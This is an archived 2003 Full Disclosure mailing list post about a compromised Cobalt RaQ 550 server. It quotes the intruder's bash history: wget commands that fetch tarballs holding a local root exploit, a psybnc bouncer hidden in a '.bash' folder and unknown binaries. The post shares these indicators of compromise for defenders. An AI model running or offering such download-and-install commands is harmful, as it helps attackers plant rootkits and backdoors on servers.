Full Disclosure mailing list archives
raq 550 compromised
From: "adf--at--Code511.com" <adf () code511 com>
Date: Tue, 7 Oct 2003 03:37:24 +0200
Sorry for the "cross-post", I just saw this message on the cobalt-security mailing list today:
a user got his raq 550 compromised and he posted some bash history he found:
- wget www.ps-lov.us/pizda.tgz : unknown binaries (yet?) named "mumu"
- wget snow.prohosting.com/muiemuie/p.tar.gz : Linux kernel ptrace/kmod local root exploit from ipsec
- wget snow.prohosting.com/muiemuie/p.tgz : it will decompress psybnc in a hidden folder (.bash)
- wget snow.prohosting.com/muiemuie/km3.tgz -----> (file offline)
- wget 65.113.119.133/muiemuie/km3.tgz -----> (file offline)

Anyone seen pizda or mumu? If you are interested in all details of the post:
http://list.cobalt.com/pipermail/cobalt-security/2003-October/008607.html
-deepquest